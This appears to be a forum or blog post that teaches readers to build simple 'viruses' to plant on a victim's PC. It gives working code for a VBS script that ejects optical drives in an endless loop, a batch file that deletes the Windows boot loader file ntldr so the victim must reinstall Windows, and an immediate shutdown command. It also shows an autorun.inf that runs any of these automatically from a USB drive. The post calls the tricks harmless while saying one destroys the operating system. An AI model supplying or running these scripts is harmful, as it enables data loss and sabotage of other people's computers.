How to Create Your Own VIRUS

Guyz welcome back this post is on the virus creation....
We all face from different viruses daily.. But they are a very highly harmful.
Today i am going to show u how to create your own VIRUS.
The procedure i am going to teach u isn't very harmful but quite good to make a start in virus programming.

So lets start__ : Guys we r going  to make virus from simple notepad programming......

1. Making a Physically disturbing virus...

We generally see virus in our PC which make our PC slow, so we can get to it and we can  observer this but can't understand it..
This Physically disturbing virus is that virus which makes our PC physically disturbed..

Look..

This VBS trick will create a code which will continuously eject all your connected Optical drives. If you put them back in, it will pop them out again.

1. Copy this code and paste it in Notepad as Virus.vbs or *.vbs


Set oWMP = CreateObject("WMPlayer.OCX.7")Set colCDROMs = oWMP.cdromCollection doif colCDROMs.Count >= 1 thenFor i = 0 to colCDROMs.Count - 1colCDROMs.Item(i).EjectNext
For i = 0 to colCDROMs.Count - 1colCDROMs.Item(i).EjectNextEnd Ifwscript.sleep 5000loop





Double click to open this file and you will be impressed by this awesome trick.
All these Notepad tricks are totally harmless and would not harm your PC in any way.  To close any of the VBS trick given, open task manager and close the wscript.exe process. These tricks work on Windows 8, Windows 7, Windows Vista and Windows XP.


2. Crashing "WINDOWS"

This part is of creating such a virus which completely destroys the Operating System and the victim has to install a new copy of  WINDOWS OS

Lets see.._____

1. Just copy the code given below and paste it in the NOTEPAD and save it as .bat file

attrib -S-R-H C:\ntldr
del ntldr


Don't try this on your PC or else your OS will be crashed...

3. SHUTDOWN_SHUTDOWN_............

This type of VIRUS if implanted on victims PC he would get fed up and atlast might install new COPY of WINDOWS... :) ;P

Lets see___


1. Copy the code given below and paste it in the NOTEPAD and save it as .bat file

shutdown -s -t 00

This virus shutdowns the PC immediately when executed..


NOTE:



If u want these viruses should execute automatically when u connect ur pendrive follow this procedure..

create a notepad file and paste the following code in it..

[autorun]
open=anything.bat
Icon=anything
and save it as autorun.inf 

Here the "anything" is the file's name (u should put ur virus's file name), in case of VBS file just change the extension from .bat to .vbs , in the above code. And copy all the three files( autorun.inf and virus.bat ) in ur pendrive 

Comments

Popular Posts